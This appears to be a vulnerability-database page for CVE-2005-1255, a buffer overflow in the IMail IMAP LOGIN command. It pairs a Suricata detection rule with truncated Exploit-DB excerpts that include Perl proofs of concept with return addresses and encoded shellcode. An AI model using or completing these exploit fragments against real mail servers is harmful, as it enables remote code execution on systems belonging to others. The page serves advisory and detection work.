CVE-2005-1255
published 2005-05-25CVE-2005-1255: Multiple stack-based buffer overflows in the IMAP server in IMail 8.12 and 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server…
PriorityP357critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
42.81%
98.5th percentile
Multiple stack-based buffer overflows in the IMAP server in IMail 8.12 and 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allow remote attackers to execute arbitrary code via a LOGIN command with (1) a long username argument or (2) a long username argument that begins with a special character.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | imail | — | — |
| ipswitch | imail | — | — |
| ipswitch | imail_server | <= 8.2_hotfix_2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL IMAP login buffer overflow attempt
suricata·2010-09-23
CVE-1999-0005 GPL IMAP login buffer overflow attempt
GPL IMAP login buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
Exploit-DB
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
exploitdb·2010-08-25
CVE-2006-1255 Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)
---
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
Since the room for shellcode is small, using the reverse ordinal payloads
yields the best results.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10150 $',
'References' =>
[
[ 'CVE', '2006-125
Exploit-DB
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
exploitdb·2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
exploitdb·2007-01-15
CVE-2006-1255 Mercur Messaging 2005 - IMAP Remote Buffer Overflow
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
---
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";
my $nop = "\x90"x8;
my $nop1 = "\x90"x20;
my $ret = "\x42\xb2\xc1\x40";
#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe
my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";
# asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#
# 8BC7 MOV EAX,EDI
# 83C0 23 ADD EAX,23
# 50 PUSH EAX
# C3 RETN
#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)b
Exploit-DB
IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution
exploitdb·2005-08-01
CVE-2005-1255 IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution
IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution
---
# IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope
# June 2005
# Confidential!
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x9
Exploit-DB
IPSwitch IMAP Server - LOGON Remote Stack Overflow
exploitdb·2005-06-07
CVE-2005-1255 IPSwitch IMAP Server - LOGON Remote Stack Overflow
IPSwitch IMAP Server - LOGON Remote Stack Overflow
---
/*
IpSwitch IMAP Server LOGON stack overflow.
Software Hole discovered by iDEFENSE
POC written by nolimit and BuzzDee
First, some information for the few of you that know how this stuff works.
The reason you see no SP2 or 2003 offsets is because of Windows SEH checks.
Thats right, in this one situation, They've stopped hackers from exploiting the machine.
At least with as much research as I care to do. The problem lies in the
fact that only alpha numeric memory addresses can be used in this exploit.
So what lies within the few regions of memory that is alpha numeric safe? Only system
DLLs.(Well also a 7000 byte TEB block section, which doesn't really produce much either).
So any SEH address overwritten that points to a system DLL wi
No writeups or analysis indexed.
http://securitytracker.com/id?1014047http://www.idefense.com/application/poi/display?id=243&type=vulnerabilitieshttp://www.ipswitch.com/support/imail/releases/imail_professional/im82hf2.htmlhttp://www.securityfocus.com/bid/13727http://securitytracker.com/id?1014047http://www.idefense.com/application/poi/display?id=243&type=vulnerabilitieshttp://www.ipswitch.com/support/imail/releases/imail_professional/im82hf2.htmlhttp://www.securityfocus.com/bid/13727
2005-05-25
Published